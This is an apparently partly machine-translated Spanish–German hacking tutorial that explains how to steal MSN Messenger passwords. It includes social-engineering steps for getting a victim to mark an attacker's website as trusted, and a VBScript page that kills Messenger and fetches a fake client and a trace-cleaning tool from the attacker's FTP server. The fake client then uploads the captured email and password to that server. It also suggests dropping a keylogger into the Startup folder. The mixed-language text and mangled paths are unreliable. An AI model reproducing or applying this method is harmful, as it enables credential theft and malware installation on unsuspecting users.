So erhalten Sie Ihr Passwort aus dem MSN Messenger (Eigene und Werke)
Si estáis hasta las pelotas de bajaros programas que no funcionan o malditos troyanos que los detectan los antivirus de los “PC clientes”… habéis encontrado lo que buscábais, una forma de sacar la contraseña de la forma más limpia que puede haber, y lo que es más importante, que ellos no se enteren. La forma de lograrlo es algo compleja pero sencilla a su vez, es como todo, algo macarronico o casero, pero funciona, se resume en varias partes. Lo he logrado con un programa de Visual Basic hecho por mí, usando web y ftp. Por cierto si eres un poco listo te darás cuenta que con la primera parte de este documento podrías meterle cualquier fichero en su disco y en el path que quieras, Zum Beispiel in “C:Dokumente und EinstellungenAlle BenutzerMenú InicioProgramasInicio” es cosa de usar la cabeza y ahi meterle un keylogger, un archivo que borre cosas… (tener malas ideas no es lo mio) ;}
Anforderungen:
– Servidor web.
– FTP-Server.
La cosa es que el usuario se conecta a una web y sin darse cuenta se le baja un Messenger falso (sin hacer nada más que entrar en la web). Cuando vaya a usar su MSN, le salta uno falso, que es identico al bueno, el pardillo mete la contraseña y el MSN le da un error: “No te puedes conectar ahora, Blabla, Blabla…”, y al darle a cualquier botón (Reintentar, Abbrechen, al cerrar..) se le abre el MSN bueno y se le conecta; el usuario final no se entera que sus credenciales se han metido en un servidor FTP (con su mail + Passwort) mientras sucedia todo. Al final no se deja ningún rastro en el PC del infectado.
Pasos que debemos hacer nosotros (como piratillas):
Erste, colocamos esta web en algun lado de nuestro servidor web (no tiene pq ser nuestro servidor web, puede ser ser de terra…), es esta ejemplo.html. Si usamos de servidor IIS pues lo dejamos en C:inetpubwwwroot o si es un apache pues en /var/www/html/xxxx, si es otro servidor pues donde sea.
Sekunde, en un servidor ftp colocamos estos dos ficheros msnmsgr.exe (código fuente en VB – HIER) und tmp.exe (código fuente en VB – HIER) en el raiz del ftp.
Dritte, una vez que el usuario ya haya metido la gamba y se haya conectado a nuestra web, se haya bajado el messenger malo y se haya intentado conectar en nuestro FTP aparecerá un fichero con su loginname de Windows seguido de la extensión “.msn”, si lo abrís con el notepad veréis algo como:
|
Benutzer msn
messenger put c:manolito.msn Verlassen vi*****@*****il.com contraseñadelpanoli |
Pasos que debe hacer el usuario final (demostración):
Lo único raro (sospechoso) que debe hacer el usuario es meter como Sitios de confianza a nuestro sitio web, Aber es ist leicht von Engañarle, Decirle que es por ejemplo la web de la cuadrilla para verla o que tiene que ser así por narices…

Si abre la web le dará un error abajo, entonces se le dice que que funcione que la meta en “Sitios de confianza”, en this caso yo le he dicho que abra “HTTP (Englisch)://www.bujarra.com/ejemplo.html” pero cada unno que se ponga su html donde le le de la gana.

Nicht schlecht, esto se lo explicáis o se lo hecéis vosotros, que vaya a “Werkzeuge” > “Opciones de Internet…”

A la pestaña de “Sicherheit” y al botón de “Standorten…”

Debe desmarcar el check de abajo (1) y arriba en (2) Debe meter el nombre de la web vuestra y darle a “Hinzufügen” y a Aceptar todas las pantallas.

Entonces le saldra esto, le decis, que es 'normal’ y que le le de a “Ja”, un amigo me dice… “es que el usuario no es tonto”, y a lo que se debe de responder… “nicht dumm, sehr dumm”.

Nicht schlecht, sobald er automatisch die Webseite betritt, würde ihm Folgendes passieren:
– Das “msnmsgr.exe” original wird umbenannt in “msnmsgr.old”.
– Es wird automatisch eine Datei namens ... vom FTP kopiert “msnmsgr.exe”.
– Es wird auch eine vom FTP namens ... kopiert “tmp.exe”
Dann, wenn der Benutzer sein MSN öffnet (und falls es offen ist, keine Sorge, denn es wird mit einem Kill geschlossen, damit ich die .exe in .tmp umbenennen kann) Folgendes passiert:

Beim ersten Öffnen von MSN Messenger öffnet sich dieses, das dem falschen MSN so ähnlich wie möglich ist, und der Benutzer wird wie gewohnt auf die Schaltfläche ... klicken “Anmelden” oder zu “Datei” > “Anmelden…”

Es wird nach der E-Mail und dem Passwort fragen, und wenn es normalerweise nicht danach fragt, dann dieses Mal schon (dass sie ihm geben), Sieht das nicht fast echt aus?? Hehe, Beim Klicken auf “Annehmen” wird der folgende Fehler erscheinen:

Und egal, worauf er klickt, wird sich das schließen und den Nutzer und das Passwort an den von uns angegebenen FTP senden und anschließend (eine halbe Sekunde) wird sich dieser falsche MSN schließen und der neue öffnen,

Wie ihr seht, bewegt sich das Symbol unten schon wie immer…

Und wenn wir uns mit unserem FTP verbinden, sehen wir, dass eine .msn Datei mit dem Windows-Login des Nutzers vorhanden ist, und wenn wir sie mit dem Editor öffnen, sehen wir seine E-Mail und sein Passwort.
Einfach beeindruckend.
PS: Es versteht sich von selbst, dass jeder den FTP-Server im HTML/Visual-Basic-Code ändern muss, welcher ist, mit welchem Benutzer, mit welchem Passwort… wenn ihr es mit den ausführbaren Dateien dieses Verfahrens macht, erreicht ihr nur, sie in mein FTP einzufügen, was mir egal ist, und ihr könnt sie sehen, indem ihr denselben Benutzer/Passwort verwendet (msn/messenger).
Was geändert werden muss, etwas Erklärung + technische AKI unten:
Nicht schlecht, einmal gesehen wie es funktioniert, wenn du es selbst benutzen willst, musst du Visual Basic verwenden 6.0 um den Quellcode, der dir auf der vorherigen Webseite zur Verfügung steht, zu bearbeiten. Hier wird erklärt, welche Parameter du ändern musst, damit es mit deiner Webseite und deinem FTP funktioniert (einschließlich Benutzer und Passwort).
Änderung HTML Im Web ejemplo.html,
Zuerst gibst du dem HTML einen anderen Namen, nenne es nicht beispielhaft und gib ein, was ich weiß, ein paar Fotos, etwas, um den Endbenutzer zu täuschen. Das wäre das Skript, das mitgeliefert wird, du bearbeitest es zum Beispiel mit dem Editor und änderst nur die Werte in rot:
| … <Skriptsprache=”VBScript” type=”text/VBScript”> Option Explicit Dim objShell Set objShell = CreateObject(“WScript.Shell”) objShell.Run “%comspec% /c tskill msnmsgr” ,0 <– Dieser MSDOS-Befehl beendet (falls es aktiv ist) den MSN Messenger. objShell.Run “%comspec% /c copy ” & chr(34) & “C:ProgrammeOrdnerMSN Messengermsnmsgr.exe” & chr(34) & ” ” & chr(34) & “C:ProgrammeOrdnerMSN Messengermsnmsgr.old” & chr(34), 0 <– Dies benennt die ausführbare Datei des MSN um objShell.Run “%comspec% /c echo user msn> c:ftp.txt”, 0 <– Erstellt in C: eine temporäre Datei, um sie später auszuführen und diese Daten per FTP hochzuladen, in dieser Zeile wird der FTP-Benutzer eingetragen, ÄNDERE ES. objShell.Run “%comspec% /c echo messenger>> c:ftp.txt”, 0 <– Jetzt wird das FTP-Passwort in die temporäre Datei eingetragen. objShell.Run “%comspec% /c echo get tmp.exe ” & chr(34) & “C:Archivos de programaMSN Messengertmp.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Obtiene el tmp.exe que este lo que hace es limpiar el PC de la victima de 'pruebas'. objShell.Run “%comspec% /c echo get msnmsgr.exe ” & chr(34) & “C:ProgrammeOrdnerMSN Messengermsnmsgr.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Con este comando de MSDOS se obtiene el MSN maligggno, Hehe. objShell.Run “%comspec% /c echo quit>> c:ftp.txt”, 0 <– Con el QUIT finalizamos la sesion del FTP. objShell.Run “%comspec% /c ftp -n -s:C:ftp.txt www.bujarra.com“, 0 <– Ahora sólo queda ejecutar el comando de conexión al FTP, lo hará cuando abra la web.WScript.Quit </Skript> … |
Nicht schlecht, ahora queda las modificaciones de VBasic, Ändert nur las palabras en rot y después recuerda Kompilieren y colgarlo del FTP:
|
Form2 del msnhhh.vbp Private Sub cmdAceptar_Click() |
Recuerda que los códigos fuentes de estos ficheros los tienes AKI: msnmsgr.exe und tmp.exe








































